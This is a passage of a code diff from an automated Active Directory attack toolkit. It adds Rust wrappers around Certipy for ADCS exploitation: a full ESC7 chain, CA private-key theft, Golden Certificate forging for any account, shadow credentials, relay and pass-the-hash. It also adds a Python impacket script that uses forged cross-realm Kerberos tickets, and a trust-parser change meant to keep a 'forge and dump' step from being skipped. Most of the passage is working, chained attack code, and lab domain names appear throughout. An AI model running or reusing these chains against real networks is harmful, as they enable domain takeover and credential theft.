+$password = New-Object PSCredential
+"#;
+        let params = json!({"domain": "contoso.local"});
+        let creds = parse_spider_credentials(output, &params);
+        assert!(
+            creds.is_empty(),
+            "expected zero creds, got {:?}",
+            creds
+                .iter()
+                .map(|c| format!("{}:{}", c["username"], c["password"]))
+                .collect::<Vec<_>>()
+        );
+    }
+
     // ── split_domain_user ─────────────────────────────────────────
 
     #[test]
diff --git a/ares-tools/src/parsers/trust.rs b/ares-tools/src/parsers/trust.rs
index 8eb523b0..74aa069a 100644
--- a/ares-tools/src/parsers/trust.rs
+++ b/ares-tools/src/parsers/trust.rs
@@ -11,8 +11,10 @@ const TRUST_DIRECTION_BIDIRECTIONAL: u32 = 3;
 const TRUST_TYPE_PARENT_CHILD: u32 = 1; // same forest
 const TRUST_TYPE_TREE_ROOT: u32 = 2; // tree root (also intra-forest)
 
-/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flag for forest transitive trust.
+/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flags.
 const TRUST_ATTR_FOREST_TRANSITIVE: u32 = 0x00000008;
+const TRUST_ATTR_WITHIN_FOREST: u32 = 0x00000020;
+const TRUST_ATTR_QUARANTINED_DOMAIN: u32 = 0x00000004;
 
 /// Parse `enumerate_domain_trusts` ldapsearch output into TrustInfo-compatible JSON values.
 ///
@@ -46,8 +48,19 @@ pub fn parse_domain_trusts(output: &str) -> Vec<Value> {
         let classified_type = classify_trust_type(trust_type, trust_attributes, cn);
 
-        let sid_filtering =
-            trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 || classified_type == "forest";
+        // Modern AD defaults to SID filtering on cross-forest/external trusts,
+        // but `netdom trust /SidFiltering /Disable` is a common lab and
+        // production reconfiguration with no corresponding LDAP attribute. The
+        // only authoritative LDAP-visible signal that filtering is *on* is the
+        // QUARANTINED_DOMAIN bit, which AD sets when a trust has been
+        // explicitly quarantined. Inferring filtering from FOREST_TRANSITIVE
+        // alone (or from classified_type) is a false-positive that
+        // permanently suppresses `forge_inter_realm_and_dump` against any
+        // misconfigured cross-forest trust — losing the entire foreign forest
+        // (the op-20260502-185055 fabrikam regression). The forge's
+        // dedup-on-empty-output path already handles the false-negative case
+        // (~30s doomed DCSync, then dedup locks and fallbacks fire).
+        let sid_filtering = trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0;
 
         Some(json!({
             "domain": cn.to_lowercase(),
@@ -111,12 +124,27 @@ pub fn parse_domain_trusts(output: &str) -> Vec<Value> {
 }
 
 /// Classify trust type from LDAP trustType and trustAttributes values.
+///
+/// trustAttributes is the authoritative signal:
+/// - WITHIN_FOREST (0x20) → intra-forest (parent_child or tree_root)
+/// - FOREST_TRANSITIVE (0x08) → cross-forest
+/// - QUARANTINED_DOMAIN (0x04) → external (with SID filtering)
+///
+/// trustType is largely informational in modern AD (almost always 2 = uplevel).
+/// Fall back to cn-label heuristics only when attributes are missing.
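+///
+/// e.g. an ldapsearch record with `trustAttributes: 8` classifies as "forest",
+/// `trustAttributes: 32` as "parent_child", and `trustAttributes: 4` as
+/// "external" (these mirror the unit tests below).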
 fn classify_trust_type(trust_type: u32, trust_attributes: u32, cn: &str) -> String {
-    // Forest transitive flag → cross-forest trust
+    // Authoritative attribute checks first.
+    if trust_attributes & TRUST_ATTR_WITHIN_FOREST != 0 {
+        return "parent_child".to_string();
+    }
     if trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 {
         return "forest".to_string();
     }
+    if trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 {
+        return "external".to_string();
+    }
 
+    // Fall back to legacy trustType-based heuristics.
     match trust_type {
         TRUST_TYPE_PARENT_CHILD => "parent_child".to_string(),
         TRUST_TYPE_TREE_ROOT => {
@@ -150,7 +178,9 @@ flatName: FABRIKAM
         assert_eq!(trusts[0]["flat_name"], "FABRIKAM");
         assert_eq!(trusts[0]["direction"], "bidirectional");
         assert_eq!(trusts[0]["trust_type"], "forest");
-        assert!(trusts[0]["sid_filtering"].as_bool().unwrap());
+        // FOREST_TRANSITIVE (0x08) alone does NOT imply SID filtering — only
+        // QUARANTINED_DOMAIN (0x04) is authoritative. See parse_domain_trusts.
+        assert!(!trusts[0]["sid_filtering"].as_bool().unwrap());
     }
 
     #[test]
@@ -221,6 +251,10 @@ flatName: CHILD
         assert_eq!(trusts.len(), 1);
         assert_eq!(trusts[0]["direction"], "outbound");
         assert_eq!(trusts[0]["trust_type"], "external");
+        // Without QUARANTINED_DOMAIN we don't infer SID filtering — labs and
+        // misconfigured prod often have it disabled and there's no other
+        // LDAP-visible signal. The forge will attempt and dedup-on-empty if
+        // filtering is actually on.
         assert!(!trusts[0]["sid_filtering"].as_bool().unwrap());
     }
 
@@ -250,6 +284,30 @@ flatName: CHILD
         assert_eq!(trusts[0]["trust_type"], "parent_child");
     }
 
+    #[test]
+    fn parse_trust_within_forest_from_child_view() {
+        // When enumerating from child looking up to parent, cn is short
+        // ("contoso.local") but trustAttributes has WITHIN_FOREST (0x20).
+        // The attribute is authoritative and should yield parent_child.
+        let output =
+            "cn: contoso.local\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 32\nflatName: CONTOSO\n";
+        let trusts = parse_domain_trusts(output);
+        assert_eq!(trusts.len(), 1);
+        assert_eq!(trusts[0]["trust_type"], "parent_child");
+        assert!(!trusts[0]["sid_filtering"].as_bool().unwrap());
+    }
+
+    #[test]
+    fn parse_trust_quarantined_external() {
+        // QUARANTINED_DOMAIN (0x04) → external trust with SID filtering.
+        let output =
+            "cn: partner.com\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 4\nflatName: PARTNER\n";
+        let trusts = parse_domain_trusts(output);
+        assert_eq!(trusts.len(), 1);
+        assert_eq!(trusts[0]["trust_type"], "external");
+        assert!(trusts[0]["sid_filtering"].as_bool().unwrap());
+    }
+
     #[test]
     fn parse_trust_domain_lowercased() {
         let output = "cn: FABRIKAM.LOCAL\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 8\nflatName: FABRIKAM\n";
diff --git a/ares-tools/src/privesc/adcs.rs b/ares-tools/src/privesc/adcs.rs
index 9e7c358e..2b98c2b8 100644
--- a/ares-tools/src/privesc/adcs.rs
+++ b/ares-tools/src/privesc/adcs.rs
@@ -9,33 +9,41 @@ use crate::ToolOutput;
 
 /// Enumerate ADCS certificate templates and CAs using Certipy.
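+/// Roughly the command this builds (sketch — flags mirror the builder below;
+/// values are illustrative): `certipy find -u 'svc@contoso.local' -p '<pass>'
+/// -dc-ip 192.168.58.10 -text -stdout -vulnerable`.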
 ///
-/// Required args: `username`, `domain`, `password`, `dc_ip`
-/// Optional args: `vulnerable`
+/// Required args: `username`, `domain`, `dc_ip`
+/// Optional args: `password`, `hashes`, `vulnerable`
 pub async fn certipy_find(args: &Value) -> Result<ToolOutput> {
     let username = required_str(args, "username")?;
     let domain = required_str(args, "domain")?;
-    let password = required_str(args, "password")?;
     let dc_ip = required_str(args, "dc_ip")?;
-    let vulnerable = optional_bool(args, "vulnerable").unwrap_or(false);
+    let vulnerable = optional_bool(args, "vulnerable").unwrap_or(true);
+    let hashes = optional_str(args, "hashes");
 
     let user_at_domain = format!("{username}@{domain}");
 
-    CommandBuilder::new("certipy")
+    let mut cmd = CommandBuilder::new("certipy")
         .arg("find")
-        .flag("-u", user_at_domain)
-        .flag("-p", password)
+        .flag("-u", &user_at_domain)
         .flag("-dc-ip", dc_ip)
         .arg("-text")
+        .arg("-stdout")
         .arg_if(vulnerable, "-vulnerable")
-        .timeout_secs(120)
-        .execute()
-        .await
+        .timeout_secs(120);
+
+    if let Some(h) = hashes {
+        cmd = cmd.flag("-hashes", h);
+    } else {
+        let password = required_str(args, "password")?;
+        cmd = cmd.flag("-p", password);
+    }
+
+    cmd.execute().await
 }
 
 /// Request a certificate from an ADCS CA using Certipy.
 ///
 /// Required args: `username`, `domain`, `password`, `ca`, `template`, `dc_ip`
-/// Optional args: `upn`
+/// Optional args: `upn`, `target` (CA server IP/hostname — use when CA is not on the DC),
+/// `sid` (SID to embed in cert), `out` (output PFX filename)
 pub async fn certipy_request(args: &Value) -> Result<ToolOutput> {
     let username = required_str(args, "username")?;
     let domain = required_str(args, "domain")?;
@@ -44,6 +52,24 @@ pub async fn certipy_request(args: &Value) -> Result<ToolOutput> {
     let template = required_str(args, "template")?;
     let dc_ip = required_str(args, "dc_ip")?;
     let upn = optional_str(args, "upn");
+    let sid = optional_str(args, "sid");
+    let target = optional_str(args, "target")
+        .or_else(|| optional_str(args, "ca_host"))
+        .or_else(|| optional_str(args, "target_ip"));
+    let application_policies = optional_str(args, "application_policies");
+
+    // Generate a unique output filename to avoid certipy's interactive overwrite
+    // prompt which kills non-interactive runs. Use template + epoch millis.
+    let out = match optional_str(args, "out") {
+        Some(o) => o.to_string(),
+        None => {
+            let ts = std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_millis())
+                .unwrap_or(0);
+            format!("cert_{template}_{ts}")
+        }
+    };
 
     let user_at_domain = format!("{username}@{domain}");
 
@@ -54,7 +80,11 @@ pub async fn certipy_request(args: &Value) -> Result<ToolOutput> {
         .flag("-ca", ca)
         .flag("-template", template)
         .flag("-dc-ip", dc_ip)
+        .flag("-out", out)
+        .flag_opt("-target", target)
         .flag_opt("-upn", upn)
+        .flag_opt("-sid", sid)
+        .flag_opt("-application-policies", application_policies)
         .timeout_secs(120)
         .execute()
         .await
@@ -68,6 +98,15 @@ pub async fn certipy_auth(args: &Value) -> Result<ToolOutput> {
     let dc_ip = required_str(args, "dc_ip")?;
     let domain = required_str(args, "domain")?;
 
+    // Certipy auth writes .ccache based on cert subject (e.g. administrator.ccache)
+    // and does NOT support -out. Remove existing .ccache files to prevent the
+    // interactive "Overwrite? (y/n)" prompt that kills non-interactive runs.
+    let _ = tokio::process::Command::new("sh")
+        .arg("-c")
+        .arg("rm -f *.ccache 2>/dev/null")
+        .output()
+        .await;
+
     CommandBuilder::new("certipy")
         .arg("auth")
         .flag("-pfx", pfx_path)
@@ -80,25 +119,392 @@ pub async fn certipy_auth(args: &Value) -> Result<ToolOutput> {
 
 /// Perform Certipy Shadow Credentials attack (auto mode).
 ///
-/// Required args: `username`, `domain`, `password`, `target`, `dc_ip`
+/// Required args: `username`, `domain`, `target`, `dc_ip`
+/// Required (one of): `password`, `hashes`
 pub async fn certipy_shadow(args: &Value) -> Result<ToolOutput> {
     let username = required_str(args, "username")?;
     let domain = required_str(args, "domain")?;
-    let password = required_str(args, "password")?;
     let target = required_str(args, "target")?;
     let dc_ip = required_str(args, "dc_ip")?;
+    let hashes = optional_str(args, "hashes");
 
     let user_at_domain = format!("{username}@{domain}");
 
-    CommandBuilder::new("certipy")
+    // Generate unique output name to avoid interactive overwrite prompt
+    let out = match optional_str(args, "out") {
+        Some(o) => o.to_string(),
+        None => {
+            let ts = std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_millis())
+                .unwrap_or(0);
+            format!("shadow_{target}_{ts}")
+        }
+    };
+
+    // certipy shadow auto internally calls certipy auth which writes .ccache
+    // based on the target account name. Remove existing .ccache to prevent the
+    // interactive "Overwrite? (y/n)" prompt.
+    let _ = tokio::process::Command::new("sh")
+        .arg("-c")
+        .arg("rm -f *.ccache 2>/dev/null")
+        .output()
+        .await;
+
+    let mut cmd = CommandBuilder::new("certipy")
         .arg("shadow")
         .arg("auto")
         .flag("-username", user_at_domain)
-        .flag("-password", password)
         .flag("-account", target)
         .flag("-dc-ip", dc_ip)
+        .flag("-out", out)
+        .timeout_secs(120);
+
+    if let Some(h) = hashes {
+        cmd = cmd.flag("-hashes", h);
+    } else {
+        let password = required_str(args, "password")?;
+        cmd = cmd.flag("-password", password);
+    }
+
+    cmd.execute().await
+}
+
+/// Certipy CA management operations (add-officer, issue-request, backup).
+///
+/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`
+/// Required: exactly one of:
+/// - `add_officer` (bool, true)
+/// - `issue_request` (integer request ID)
+/// - `backup` (bool, true) — exports the CA private key to `<CA name>.pfx` in CWD.
+///   Requires SYSTEM-equivalent access on the CA host (e.g., the calling
+///   process is running on a host where `username` is local administrator).
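+///
+/// Example invocation (illustrative values): `{"username": "svc-esc7",
+/// "domain": "contoso.local", "password": "...", "dc_ip": "192.168.58.10",
+/// "ca": "contoso-CA", "backup": true}`, which maps to
+/// `certipy ca -username svc-esc7@contoso.local ... -ca contoso-CA -backup`.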
+pub async fn certipy_ca(args: &Value) -> Result<ToolOutput> {
+    let username = required_str(args, "username")?;
+    let domain = required_str(args, "domain")?;
+    let password = required_str(args, "password")?;
+    let dc_ip = required_str(args, "dc_ip")?;
+    let ca = required_str(args, "ca")?;
+
+    let user_at_domain = format!("{username}@{domain}");
+
+    let add_officer = optional_bool(args, "add_officer").unwrap_or(false);
+    let backup = optional_bool(args, "backup").unwrap_or(false);
+    let issue_request = args
+        .get("issue_request")
+        .and_then(|v| v.as_i64())
+        .map(|v| v as i32);
+
+    let mut cmd = CommandBuilder::new("certipy")
+        .arg("ca")
+        .flag("-username", user_at_domain)
+        .flag("-password", password)
+        .flag("-dc-ip", dc_ip)
+        .flag("-ca", ca)
+        .timeout_secs(180);
+
+    if add_officer {
+        cmd = cmd.flag("-add-officer", format!("{username}@{domain}"));
+    }
+    if let Some(req_id) = issue_request {
+        cmd = cmd.flag("-issue-request", req_id.to_string());
+    }
+    if backup {
+        cmd = cmd.arg("-backup");
+    }
+
+    cmd.execute().await
+}
+
+/// Forge a "Golden Certificate" from a stolen CA PFX (the `-backup` output of
+/// `certipy_ca`). Produces a client PFX that authenticates as `upn` on the CA's
+/// domain — the universal terminal node for ADCS compromise: any path that
+/// gets SYSTEM on a CA host can chain `certipy_ca backup` → this tool →
+/// `certipy_auth` to obtain a TGT/NT hash for any principal in the domain.
+///
+/// Required args: `ca_pfx` (path to stolen CA PFX), `upn` (target principal,
+/// e.g. `administrator@fabrikam.local`)
+/// Optional args: `subject`, `template`, `out` (output PFX path)
+pub async fn certipy_forge(args: &Value) -> Result<ToolOutput> {
+    let ca_pfx = required_str(args, "ca_pfx")?;
+    let upn = required_str(args, "upn")?;
+    let subject = optional_str(args, "subject");
+    let template = optional_str(args, "template");
+
+    let out = match optional_str(args, "out") {
+        Some(o) => o.to_string(),
+        None => {
+            let ts = std::time::SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .map(|d| d.as_millis())
+                .unwrap_or(0);
+            let safe_upn = upn.replace(['/', '\\', ' '], "_");
+            format!("forged_{safe_upn}_{ts}.pfx")
+        }
+    };
+
+    CommandBuilder::new("certipy")
+        .arg("forge")
+        .flag("-ca-pfx", ca_pfx)
+        .flag("-upn", upn)
+        .flag_opt("-subject", subject)
+        .flag_opt("-template", template)
+        .flag("-out", out)
+        .timeout_secs(60)
+        .execute()
+        .await
+}
+
+/// Retrieve a previously issued certificate by request ID.
+///
+/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`,
+/// `request_id`
+/// Optional args: `target` (CA server IP)
+pub async fn certipy_retrieve(args: &Value) -> Result<ToolOutput> {
+    let username = required_str(args, "username")?;
+    let domain = required_str(args, "domain")?;
+    let password = required_str(args, "password")?;
+    let dc_ip = required_str(args, "dc_ip")?;
+    let ca = required_str(args, "ca")?;
+    let request_id = args
+        .get("request_id")
+        .and_then(|v| v.as_i64())
+        .ok_or_else(|| anyhow::anyhow!("missing required arg: request_id"))? as i32;
+    let target = optional_str(args, "target")
+        .or_else(|| optional_str(args, "ca_host"))
+        .or_else(|| optional_str(args, "target_ip"));
+
+    let user_at_domain = format!("{username}@{domain}");
+
+    let ts = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map(|d| d.as_millis())
+        .unwrap_or(0);
+    let out = format!("cert_retrieve_{request_id}_{ts}");
+
+    CommandBuilder::new("certipy")
+        .arg("req")
+        .flag("-username", user_at_domain)
+        .flag("-password", password)
+        .flag("-ca", ca)
+        .flag("-retrieve", request_id.to_string())
+        .flag("-dc-ip", dc_ip)
+        .flag("-out", out)
+        .flag_opt("-target", target)
+        .timeout_secs(120)
+        .execute()
+        .await
+}
+
+/// Run the full ESC7 exploitation chain: add officer → request SubCA cert
+/// (gets denied) → issue the pending request → retrieve cert → authenticate.
+///
+/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`
+/// Optional args: `target` (CA server IP), `upn`, `sid`
+pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
+    let username = required_str(args, "username")?;
+    let domain = required_str(args, "domain")?;
+    let password = required_str(args, "password")?;
+    let dc_ip = required_str(args, "dc_ip")?;
+    let ca = required_str(args, "ca")?;
+    let upn = optional_str(args, "upn")
+        .unwrap_or("administrator")
+        .to_string();
+    let target = optional_str(args, "target")
+        .or_else(|| optional_str(args, "ca_host"))
+        .or_else(|| optional_str(args, "target_ip"));
+    let sid = optional_str(args, "sid");
+
+    let upn_full = if upn.contains('@') {
+        upn.clone()
+    } else {
+        format!("{upn}@{domain}")
+    };
+
+    let user_at_domain = format!("{username}@{domain}");
+    let mut outputs = Vec::new();
+
+    // Step 1: Add self as CA officer (certipy v5 requires principal as arg)
+    let mut step1_cmd = CommandBuilder::new("certipy")
+        .arg("ca")
+        .flag("-username", &user_at_domain)
+        .flag("-password", password)
+        .flag("-dc-ip", dc_ip)
+        .flag("-ca", ca)
+        .flag("-add-officer", username);
+    if let Some(t) = &target {
+        step1_cmd = step1_cmd.flag("-target", *t);
+    }
+    let step1 = step1_cmd.timeout_secs(120).execute().await?;
+    outputs.push(("Add Officer", step1));
+
+    // Step 2: Request cert with SubCA template (will be denied/pending)
+    let ts = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map(|d| d.as_millis())
+        .unwrap_or(0);
+    let out_name = format!("cert_esc7_{ts}");
+
+    let mut req_cmd = CommandBuilder::new("certipy")
+        .arg("req")
+        .flag("-username", &user_at_domain)
+        .flag("-password", password)
+        .flag("-ca", ca)
+        .flag("-template", "SubCA")
+        .flag("-upn", &upn_full)
+        .flag("-dc-ip", dc_ip)
+        .flag("-out", &out_name);
+    if let Some(t) = &target {
+        req_cmd = req_cmd.flag("-target", *t);
+    }
+    if let Some(s) = &sid {
+        req_cmd = req_cmd.flag("-sid", *s);
+    }
+    // Certipy asks "Would you like to save the private key? (y/N)" when the
+    // SubCA request is denied — we need to answer "y" to keep the key for later.
+    let step2 = req_cmd.stdin("y\n").timeout_secs(120).execute().await?;
+
+    // Parse the request ID from certipy output (e.g., "Request ID is 42")
+    let request_id = step2
+        .stdout
+        .lines()
+        .chain(step2.stderr.lines())
+        .find_map(|line| {
+            let lower = line.to_lowercase();
+            if lower.contains("request id") {
+                line.split_whitespace()
+                    .filter_map(|w| w.trim_end_matches('.').parse::<i32>().ok())
+                    .next_back()
+            } else {
+                None
+            }
+        });
+    outputs.push(("Request SubCA", step2));
+
+    let req_id = match request_id {
+        Some(id) => id,
+        None => {
+            let combined = outputs
+                .iter()
+                .map(|(name, o)| format!("=== {name} ===\n{}\n{}", o.stdout, o.stderr))
+                .collect::<Vec<_>>()
+                .join("\n");
+            return Ok(ToolOutput {
+                stdout: combined,
+                stderr: "ERROR: Could not parse request ID from certipy output".into(),
+                exit_code: Some(1),
+                success: false,
+            });
+        }
+    };
+
+    // Step 3: Issue the pending request using ManageCA rights
+    let mut step3_cmd = CommandBuilder::new("certipy")
+        .arg("ca")
+        .flag("-username", &user_at_domain)
+        .flag("-password", password)
+        .flag("-dc-ip", dc_ip)
+        .flag("-ca", ca)
+        .flag("-issue-request", req_id.to_string());
+    if let Some(t) = &target {
+        step3_cmd = step3_cmd.flag("-target", *t);
+    }
+    let step3 = step3_cmd.timeout_secs(120).execute().await?;
+    outputs.push(("Issue Request", step3));
+
+    // Step 4: Retrieve the issued certificate
+    let mut step4 = CommandBuilder::new("certipy")
+        .arg("req")
+        .flag("-username", &user_at_domain)
+        .flag("-password", password)
+        .flag("-ca", ca)
+        .flag("-retrieve", req_id.to_string())
+        .flag("-dc-ip", dc_ip)
+        .flag("-out", &out_name);
+    if let Some(t) = &target {
+        step4 = step4.flag("-target", *t);
+    }
+    let step4_out = step4.timeout_secs(120).execute().await?;
+    outputs.push(("Retrieve Cert", step4_out));
+
+    // Step 4b: If certipy couldn't create a PFX (key mismatch), combine manually
+    let pfx_path = format!("{out_name}.pfx");
+    let crt_path = format!("{out_name}.crt");
+    let key_path = format!("{out_name}.key");
+    if !tokio::fs::try_exists(&pfx_path).await.unwrap_or(false)
+        && tokio::fs::try_exists(&crt_path).await.unwrap_or(false)
+        && tokio::fs::try_exists(&key_path).await.unwrap_or(false)
+    {
+        let combine = CommandBuilder::new("openssl")
+            .arg("pkcs12")
+            .flag("-in", &crt_path)
+            .flag("-inkey", &key_path)
+            .arg("-export")
+            .flag("-out", &pfx_path)
+            .flag("-passout", "pass:")
+            .timeout_secs(30)
+            .execute()
+            .await?;
+        outputs.push(("Combine PFX", combine));
+    }
+
+    // Step 5: Authenticate with the retrieved PFX
+    let _ = tokio::process::Command::new("sh")
+        .arg("-c")
+        .arg("rm -f *.ccache 2>/dev/null")
+        .output()
+        .await;
+
+    let step5 = CommandBuilder::new("certipy")
+        .arg("auth")
+        .flag("-pfx", &pfx_path)
+        .flag("-dc-ip", dc_ip)
+        .flag("-domain", domain)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+    let auth_success = step5.success;
+    outputs.push(("Authenticate", step5));
+
+    let combined_stdout = outputs
+        .iter()
+        .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stdout))
+        .collect::<Vec<_>>()
+        .join("\n");
+    let combined_stderr = outputs
+        .iter()
+        .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stderr))
+        .collect::<Vec<_>>()
+        .join("\n");
+
+    Ok(ToolOutput {
+        stdout: combined_stdout,
+        stderr: combined_stderr,
+        exit_code: if auth_success { Some(0) } else { Some(1) },
+        success: auth_success,
+    })
+}
+
+/// Start a Certipy relay listener for ESC8 (HTTP) or ESC11 (RPC) attacks.
+///
+/// Required args: `target`, `ca`
+/// Optional args: `template`
+///
+/// For ESC8: `certipy relay -target http://ca-host -ca CA-NAME`
+/// For ESC11: `certipy relay -target rpc://ca-host -ca CA-NAME`
+pub async fn certipy_relay(args: &Value) -> Result<ToolOutput> {
+    let target = required_str(args, "target")?;
+    let ca = required_str(args, "ca")?;
+    let template = optional_str(args, "template");
+
+    CommandBuilder::new("certipy")
+        .arg("relay")
+        .flag("-target", target)
+        .flag("-ca", ca)
+        .flag_opt("-template", template)
+        .timeout_secs(300)
+        .execute()
+        .await
 }
 
@@ -130,12 +536,34 @@ pub async fn certipy_template_esc4(args: &Value) -> Result<ToolOutput> {
 /// request -> authentication.
 ///
 /// Required args: `username`, `domain`, `password`, `template`, `dc_ip`,
-/// `ca`, `pfx_path`
-/// Optional args: `upn`
+/// `ca`
+/// Optional args: `upn`, `target`, `sid`
 pub async fn certipy_esc4_full_chain(args: &Value) -> Result<ToolOutput> {
     let template_output = certipy_template_esc4(args).await?;
-    let request_output = certipy_request(args).await?;
-    let auth_output = certipy_auth(args).await?;
+
+    // Generate a unique output name for the PFX and inject into args
+    let template = args
+        .get("template")
+        .and_then(|v| v.as_str())
+        .unwrap_or("esc4");
+    let ts = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map(|d| d.as_millis())
+        .unwrap_or(0);
+    let out_name = format!("cert_{template}_{ts}");
+    let pfx_path = format!("{out_name}.pfx");
+
+    let mut req_args = args.clone();
+    if let Some(obj) = req_args.as_object_mut() {
+        obj.insert("out".into(), serde_json::json!(out_name));
+    }
+    let request_output = certipy_request(&req_args).await?;
+
+    let mut auth_args = args.clone();
+    if let Some(obj) = auth_args.as_object_mut() {
+        obj.insert("pfx_path".into(), serde_json::json!(pfx_path));
+    }
+    let auth_output = certipy_auth(&auth_args).await?;
 
     let combined_stdout = format!(
         "=== Step 1: Template Modification ===\n{}\n\
@@ -164,6 +592,8 @@ mod tests {
     use crate::args::{optional_bool, optional_str, required_str};
     use serde_json::json;
 
+    // --- certipy_find ---
+
     #[test]
     fn certipy_find_missing_username() {
         let args = json!({
@@ -243,6 +673,8 @@ mod tests {
         assert!(vulnerable);
     }
 
+    // --- certipy_request ---
+
     #[test]
     fn certipy_request_missing_ca() {
         let args = json!({
@@ -313,6 +745,8 @@ mod tests {
         assert!(optional_str(&args, "upn").is_none());
     }
 
+    // --- certipy_auth ---
+
     #[test]
     fn certipy_auth_missing_pfx_path() {
         let args = json!({
@@ -352,6 +786,8 @@ mod tests {
         assert_eq!(required_str(&args, "domain").unwrap(), "contoso.local");
     }
 
+    // --- certipy_shadow ---
+
     #[test]
     fn certipy_shadow_missing_target() {
         let args = json!({
@@ -378,6 +814,8 @@ mod tests {
         assert_eq!(user_at_domain, "admin@contoso.local");
     }
 
+    // --- certipy_template_esc4 ---
+
     #[test]
     fn certipy_template_esc4_missing_template() {
         let args = json!({
@@ -404,6 +842,8 @@ mod tests {
         assert_eq!(user_at_domain, "admin@contoso.local");
     }
 
+    // --- mock executor tests ---
+
     use crate::executor::mock;
 
     #[tokio::test]
@@ -478,6 +918,27 @@ mod tests {
         assert!(super::certipy_template_esc4(&args).await.is_ok());
     }
 
+    #[tokio::test]
+    async fn certipy_relay_executes() {
+        mock::push(mock::success());
+        let args = json!({
+            "target": "rpc://192.168.58.10", "ca": "contoso-CA"
+        });
+        assert!(super::certipy_relay(&args).await.is_ok());
+    }
+
+    #[tokio::test]
+    async fn certipy_request_with_application_policies_executes() {
+        mock::push(mock::success());
+        let args = json!({
+            "username": "admin", "domain": "contoso.local",
+            "password": "P@ss", "ca": "contoso-CA", "template": "ESC15",
+            "dc_ip": "192.168.58.1",
+            "application_policies": "1.3.6.1.5.5.7.3.2"
+        });
+        assert!(super::certipy_request(&args).await.is_ok());
+    }
+
"P@ss", "ca": "contoso-CA", "template": "ESC15", + "dc_ip": "192.168.58.1", + "application_policies": "1.3.6.1.5.5.7.3.2" + }); + assert!(super::certipy_request(&args).await.is_ok()); + } + #[tokio::test] async fn certipy_esc4_full_chain_executes() { // 3 execute calls: template, request, auth diff --git a/ares-tools/src/privesc/cross_realm_tgs.py b/ares-tools/src/privesc/cross_realm_tgs.py new file mode 100644 index 00000000..a80e40c9 --- /dev/null +++ b/ares-tools/src/privesc/cross_realm_tgs.py @@ -0,0 +1,92 @@ +#!/usr/bin/env python3 +"""Request a TGS using a cross-realm (inter-realm) TGT. + +Workaround for impacket #315: getST/SMB cross-realm referral is broken because +``CCache.parseFile`` and ``getST.run`` only look up ``krbtgt/@`` +(a regular intra-realm TGT) when ``-k -no-pass`` is given. A forged inter-realm +TGT has server ``krbtgt/@``, so it is silently ignored and +getST falls through to a no-pass authentication that fails with +``KDC_ERR_WRONG_REALM`` (and exit 0, hiding the failure). + +This helper loads the cross-realm TGT directly out of the input ccache, calls +``getKerberosTGS`` against the target realm's KDC, and writes the resulting TGS +to a new ccache that ``nxc`` / ``secretsdump`` consume via ``KRB5CCNAME``. +""" + +import argparse +import sys + +from impacket.krb5 import constants +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGS +from impacket.krb5.types import Principal + + +def main() -> int: + p = argparse.ArgumentParser() + p.add_argument("--in-ccache", required=True, help="ccache containing the cross-realm TGT") + p.add_argument("--out-ccache", required=True, help="ccache to write resulting TGS to") + p.add_argument("--spn", required=True, help="service SPN, e.g. cifs/dc.target.local") + p.add_argument("--source-realm", required=True, help="realm where the TGT was issued") + p.add_argument("--target-realm", required=True, help="realm of the SPN") + p.add_argument("--target-kdc", required=True, help="target realm KDC IP/host to send TGS-REQ to") + p.add_argument( + "--append", + action="store_true", + help="if --out-ccache exists, load it and merge the new TGS into it (preserves the inter-realm TGT and any prior service tickets)", + ) + args = p.parse_args() + + src_realm = args.source_realm.upper() + tgt_realm = args.target_realm.upper() + + in_cc = CCache.loadFile(args.in_ccache) + if in_cc is None: + print(f"[!] failed to load {args.in_ccache}", file=sys.stderr) + return 2 + + cross_principal = f"krbtgt/{tgt_realm}@{src_realm}" + creds = in_cc.getCredential(cross_principal, anySPN=False) + if creds is None: + print(f"[!] no cross-realm TGT for {cross_principal} in {args.in_ccache}", file=sys.stderr) + return 3 + + tgt = creds.toTGT() + server = Principal(args.spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + + print( + f"[*] requesting TGS for {args.spn} from {args.target_kdc} ({tgt_realm})", + file=sys.stderr, + ) + # getKerberosTGS returns (tgs_rep, cipher, tgt_session_key, new_session_key). + # tgt_session_key decrypts the TGS-REP enc-part (key usage 8); new_session_key + # is the application key inside the TGS. fromTGS expects (tgs, oldKey, newKey). 
+    tgs, _cipher, tgt_session_key, new_session_key = getKerberosTGS(
+        server,
+        tgt_realm,
+        args.target_kdc,
+        tgt["KDC_REP"],
+        tgt["cipher"],
+        tgt["sessionKey"],
+    )
+
+    import os
+    if args.append and os.path.exists(args.out_ccache):
+        out = CCache.loadFile(args.out_ccache) or CCache()
+        scratch = CCache()
+        scratch.fromTGS(tgs, tgt_session_key, new_session_key)
+        for cred in scratch.credentials:
+            out.credentials.append(cred)
+        if out.principal is None and scratch.principal is not None:
+            out.principal = scratch.principal
+        out.saveFile(args.out_ccache)
+    else:
+        out = CCache()
+        out.fromTGS(tgs, tgt_session_key, new_session_key)
+        out.saveFile(args.out_ccache)
+    print(f"[+] wrote TGS to {args.out_ccache}", file=sys.stderr)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/ares-tools/src/privesc/cve_exploits.rs b/ares-tools/src/privesc/cve_exploits.rs
